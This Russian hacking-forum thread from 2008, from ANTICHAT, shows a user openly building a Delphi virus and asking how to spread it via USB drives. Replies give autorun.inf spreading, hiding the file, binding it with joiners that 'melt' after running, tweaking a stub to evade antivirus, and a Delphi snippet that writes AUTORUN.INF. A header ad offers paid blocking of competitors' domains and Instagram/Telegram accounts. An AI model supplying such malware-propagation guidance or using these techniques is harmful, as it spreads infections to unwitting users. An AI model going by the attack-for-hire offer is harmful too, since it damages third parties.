УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Программирование > С/С++, C#, Delphi, .NET, Asm
Заразить флешку или Миссия Невыполнима?

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Заразить флешку или Миссия Невыполнима?

23.11.2008, 12:20

ronald

Участник форума

Регистрация: 27.03.2008

Сообщений: 288

Провел на форуме:
800727

Репутация: 83

Отправить сообщение для ronald с помощью ICQ

Заразить флешку или Миссия Невыполнима?

Всем привет!
Собираю я потихоньку вирус (на Delphi

). Интересует его распространение:
1.Как заставить вирус прописываться на съёмные носители (или на диски), а там прятаться?
2.Как заставить его автоматически запуститься при подключении к другому компьютеру?(решено)
3.Не повлияет ли на его поведение склеивание и как заставить его отклеиться после первого запуска?
Разъясняю:
Предположим, я склеил вирь с картинкой или word-овским документом. Как заставить после запуска вирь распространяться уже не как картинку или документ, а как exe?
Конечно же половина постов будет посвящена гуглу, но я уже рыскал там.
За помощь +.

Последний раз редактировалось ronald; 23.11.2008 в 12:28..

23.11.2008, 12:25

NeXArmAor

Участник форума

Регистрация: 21.04.2007

Сообщений: 289

Провел на форуме:
4612647

Репутация: 368

1.Для начала пусть копирует себя на съемные носители,и потом ставит атрибут Hidden файлу
2.потом пусть создает на съемных носителях INF файл со следующим содержанием:
[autorun]
OPEN=viruscopy.exe ;это имя файла который запустится автоматически
3. Ну так все так и будет,при запуске склеянного файла происходит их высадка во временное место,а потом их запуск. И вирус начинает делать то на что он запрограммироован,независ� �мо от того с чем он был склеен.

Последний раз редактировалось NeXArmAor; 23.11.2008 в 12:39..

23.11.2008, 12:30

Chaak

Познавший АНТИЧАТ

Регистрация: 01.06.2008

Сообщений: 1,047

Провел на форуме:
5321514

Репутация: 3313

Отправить сообщение для Chaak с помощью ICQ

3- функция в джойнерах - melting

23.11.2008, 12:32

ronald

Участник форума

Регистрация: 27.03.2008

Сообщений: 288

Провел на форуме:
800727

Репутация: 83

а в каком именно джойнере её можно найти?

23.11.2008, 12:34

NeXArmAor

Участник форума

Регистрация: 21.04.2007

Сообщений: 289

Провел на форуме:
4612647

Репутация: 368

MicroJoiner самое то. Подредактируй Стаб его от паливности и все будет путем.

23.11.2008, 12:56

ronald

Участник форума

Регистрация: 27.03.2008

Сообщений: 288

Провел на форуме:
800727

Репутация: 83

кхм... вот новая порция совершенно тупых вопросов

1. Покажите плз код, который создаёт inf файл?
2. Как определить тип носителя?
3. Как отслеживать к примеру особую команду в cmd и если она будет введена остановить вирь?

23.11.2008, 13:10

NeXArmAor

Участник форума

Регистрация: 21.04.2007

Сообщений: 289

Провел на форуме:
4612647

Репутация: 368

Цитата:

handled,szed: DWORD;
command: String;
begin
command:='[autorun]'+#13#10+'OPEN=viruscopy.exe';
handled:=CreateFile('G:\AUTORUN.INF',GENERIC_WRITE ,FILE_SHARE_WRITE,nil,CREATE_ALWAYS,FILE_ATTRIBUTE _NORMAL,0);
WriteFile(handled,command,length(command),szed,0);
CloseHandle(handled);
примерно так,писал с ходу,не проверяя

2. http://www.cyberforum.ru/delphi/thread10815.html
3. Тупо. Гораздо легче ловить нажатие какой-либо назначенной клавиши с помощью GetAsyncKeyState.

Последний раз редактировалось NeXArmAor; 23.11.2008 в 13:14..

23.11.2008, 13:21

ronald

Участник форума

Регистрация: 27.03.2008

Сообщений: 288

Провел на форуме:
800727

Репутация: 83

2 NeXArmAor
А если у флехи директория не G?
тут же тогда полная "%:;№";!";!@$!@$^%!!

23.11.2008, 13:22

NeXArmAor

Участник форума

Регистрация: 21.04.2007

Сообщений: 289

Провел на форуме:
4612647

Репутация: 368

Цитата:

Сообщение от ronald

2 NeXArmAor
А если у флехи директория не G?
тут же тогда полная "%:;№";!";!@$!@$^%!!

http://www.cyberforum.ru/delphi/thread10815.html

#10

23.11.2008, 13:33

criz

Постоянный

Регистрация: 04.11.2007

Сообщений: 303

Провел на форуме:
811764

Репутация: 119

Цитата:

А если у флехи директория не G?

Можно использовать GetModuleFileName, которая вернет полный путь к проге

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Хакер и закон!	SladerNon	Болталка	17	12.11.2009 09:42
Хакеры и кракеры или "Что такое хорошо и что такое плохо?"	foreva	Чужие Статьи	12	09.02.2008 12:26
Ловушка для взломщика	k00p3r	Чужие Статьи	0	08.06.2005 16:48
На счет халявного инета	foreva	Чужие Статьи	0	06.02.2005 12:06
Как заразить сайт или чат		Чаты	2	31.07.2004 14:54

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход